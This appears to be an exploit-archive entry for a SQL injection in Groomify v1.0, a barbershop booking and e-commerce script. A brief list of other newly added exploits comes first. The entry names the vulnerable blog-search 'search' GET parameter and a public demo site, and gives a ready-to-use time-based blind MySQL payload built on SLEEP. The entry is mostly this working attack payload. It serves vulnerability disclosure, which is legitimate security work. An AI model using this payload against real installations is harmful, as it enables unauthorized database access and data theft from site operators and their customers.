147824bdba
8 changes to exploits/shellcodes/ghdb Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) Groomify v1.0 - SQL Injection Jobpilot v2.61 - SQL Injection Sales Tracker Management System v1.0 - Multiple Vulnerabilities Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) The Shop v2.5 - SQL Injection WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
22 lines
No EOL
613 B
Text
22 lines
No EOL
613 B
Text
# Exploit Title: Groomify v1.0 - SQL Injection
|
|
# Date: 2023-06-17
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor:
|
|
https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
|
|
# Demo Site: https://script.bugfinder.net/groomify
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
|
|
### Vulnerable URL ###
|
|
|
|
https://localhost/groomify/blog-search?search=payload
|
|
|
|
|
|
### Parameter & Payloads ###
|
|
|
|
Parameter: search (GET)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
|
|
AND 'rszk'='rszk |